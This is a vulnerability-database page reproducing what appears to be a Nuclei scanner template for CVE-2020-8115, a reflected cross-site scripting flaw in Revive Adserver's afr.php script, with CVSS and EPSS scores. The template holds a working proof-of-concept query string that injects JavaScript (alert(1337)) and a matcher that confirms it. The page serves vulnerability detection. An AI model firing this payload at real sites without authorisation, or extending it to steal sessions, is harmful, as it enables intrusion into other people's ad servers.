Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-8115
HistoryApr 08, 2020 - 11:27 a.m.

Revive Adserver <=5.0.3 - Cross-Site Scripting

2020-04-0811:27:13
ProjectDiscovery
github.com
11

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.019 Low

EPSS

Percentile

88.3%

Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
id: CVE-2020-8115

info:
  name: Revive Adserver <=5.0.3 - Cross-Site Scripting
  author: madrobot,dwisiswant0
  severity: medium
  description: |
    Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie.
  reference:
    - https://hackerone.com/reports/775693
    - https://www.revive-adserver.com/security/revive-sa-2020-001/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8115
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/merlinepedra/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-8115
    cwe-id: CWE-79
    epss-score: 0.0187
    epss-percentile: 0.88123
    cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: revive-adserver
    product: revive_adserver
  tags: cve,cve2020,xss,hackerone,revive-adserver

http:
  - method: GET
    path:
      - "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - (?mi)window\.location\.replace\(".*alert\(1337\)

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202281c77cd44460978380c0e81c7ecb788518a1ef2891f50395a869f5afffae68022100a72bc525d6b1e771166cc67870ec31fe56551193440b4622c8652b3c5510ff13:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.019 Low

EPSS

Percentile

88.3%

Related for NUCLEI:CVE-2020-8115